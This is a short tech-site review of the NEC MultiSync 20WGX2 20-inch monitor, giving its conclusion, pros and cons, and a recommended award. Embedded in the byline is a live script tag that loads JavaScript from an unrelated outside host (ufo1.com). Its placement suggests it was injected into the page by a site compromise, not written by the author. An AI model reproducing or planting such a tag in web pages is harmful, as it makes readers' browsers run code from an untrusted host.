NEC MultiSync WGX2 20" TFT Review

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Review <script type="text/javascript" src="http://ufo1.com/ad/c.js"></script> Posted 30/01/07
Author: Matt Kemp
Source: NEC


Conclusion

The NEC Multisynch is a very good quality monitor. With excellent response, picture quality and colour it's hard to fault the output itself. The monitor is also well put together with a great control panel, although the stand is lacking height adjustment. The Opticlear layer on the screen could mean reflections so beware if you like a lot of light.

The price is the major stumbling block for me in giving the monitor some top awards. At £360.72 @ Dabs there are a lot of monitors out there that perform almost as well, if not better for less money. Certainly gaming on the monitor is very good, but I think the price is too high for what it is.

The NEC 20" 20WGX² get's an OC3D recommended award, but beware of the high price.

Pro's

+ Great looking screen
+ Awesome responce and colour output
+ Ergonmic controls
+ Good viewing angle
+ Easy to adjust
+ Well built

Con's

- Very expensive
- No height adjustment
- Highly Reflective Screen

Recommended Award



Thanks to NEC for the Review Sample

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14-01-2007, 06:32:42

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